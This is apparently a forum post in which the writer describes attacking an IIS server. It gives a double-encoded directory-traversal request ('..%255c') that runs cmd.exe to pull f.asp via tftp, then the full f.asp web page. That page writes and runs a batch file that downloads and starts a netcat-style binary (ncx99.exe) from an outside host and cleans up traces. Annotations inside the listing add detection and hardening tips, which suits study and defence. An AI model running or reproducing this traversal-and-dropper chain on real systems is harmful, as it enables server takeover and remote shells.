Thats what I did:
http://192.168.0.1/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.ex e?/c+tftp.exe+-i+192.168.0.2+GET+f.asp+c:\inetpub\scripts\f.asp
then i ran http://192.168.0.1/f.asp
following is a copy of the f.asp:
----------cut here-------------------------
<%
' Reviewer summary of f.asp as quoted in this post:
'   1. picks the ready drive (other than A:) with the most free space,
'   2. writes a batch file dl.bat next to this page,
'   3. runs that batch through WScript.Shell,
'   4. on failure deletes dl.bat, otherwise returns the drive details in the HTTP response.
' The page is placed on the server by the request quoted above, which reaches cmd.exe
' through a path containing "..%255c" (a doubly percent-encoded backslash) and uses
' tftp.exe to fetch f.asp into c:\inetpub\scripts.
'
' What a defender can look for, based only on what this listing does:
'   - web server log entries containing "%255c" together with "cmd.exe" or "tftp.exe";
'   - cmd.exe, tftp.exe or a batch file started by the web server process;
'   - new .asp, .bat or .exe files under c:\inetpub\scripts (f.asp, dl.bat, nc0.exe here);
'   - TFTP traffic from the web server to hosts it has no reason to contact.
' Hardening that removes the preconditions: apply the vendor fix for the path decoding
' flaw, do not allow write plus execute on the scripts directory, and block outbound
' TFTP from web servers.

Set fs = CreateObject("Scripting.FileSystemObject")
Set drv = fs.Drives

' dmax = letter of the selected drive, dmac = largest AvailableSpace seen so far.
dmax = ""
dmac = 0

' Host reconnaissance: walk every drive, skipping A: and drives that are not ready,
' and remember the type, total size and serial number of the one with the most free space.
For each d in drv
    If d.Driveletter <> "A" And d.IsReady Then
        If d.AvailableSpace > dmac then
            dmac = d.AvailableSpace
            dmab = d.DriveType
            dmaa = d.TotalSize
            dmad = d.SerialNumber
            dmax = d.DriveLetter
        End If
    End If
Next

' Create dl.bat at the path server.mappath resolves for this page; the second
' argument (True) overwrites an existing file of that name.
filename = server.mappath("dl.bat")
Set tf = fs.CreateTextFile(filename, True)

' Lines written into dl.bat. The batch changes to \Inetpub\scripts, uses tftp.exe in
' binary mode (-i) to pull ncx99.exe from 192.168.1.33 and store it as nc0.exe, starts
' it and waits for it to finish (start /w), clears the read-only attribute on TFTP* and
' nc0.exe, deletes TFTP* and exits.
' NOTE(review): ncx99.exe itself is not shown on this page; treat it as an unknown
' attacker-supplied binary when triaging a host where nc0.exe is found.
tf.WriteLine("@echo off")
tf.WriteLine("cd \Inetpub\scripts")
tf.WriteLine("startDL:")
tf.WriteLine("tftp.exe -i 192.168.1.33 get ncx99.exe c:\inetpub\scripts\nc0.exe")
tf.WriteLine("if not exist ncx99.exe goto startDL")
tf.WriteLine("start /w nc0.exe")
tf.WriteLine("attrib TFTP* -r")
tf.WriteLine("attrib nc0.exe -r")
tf.WriteLine("del TFTP*")
tf.WriteLine("exit")
tf.Close

dim command
dim wshShell

' Command line = full path of dl.bat followed by the selected drive letter.
command = server.mappath("dl.bat") & " " & dmax

' Errors from here on are suppressed and inspected through Err below.
On Error Resume Next

' Process creation from script: the batch runs with whatever account the web
' server uses to execute this page.
Set wshShell = CreateObject("WScript.Shell")
wshShell.Run (command)

If Err Then
    ' Launch failed: remove dl.bat again, so on this path the batch file does not
    ' remain on disk as an artifact.
    Set objFSO = Server.CreateObject("scripting.filesystemobject")
    pathname = server.mappath("dl.bat")
    objFSO.DeleteFile pathname
    Set objFSO = Nothing
Else
    ' Launch succeeded: return the drive details to the requester as
    ' |letter*type*free*total*serial -- a response body of this shape in a proxy or
    ' packet capture indicates the page was executed.
    Response.Write "|" & dmax & "*" & dmab & "*" & dmac & "*" & dmaa & "*" & dmad
End If
%>
-----------cut here----------------------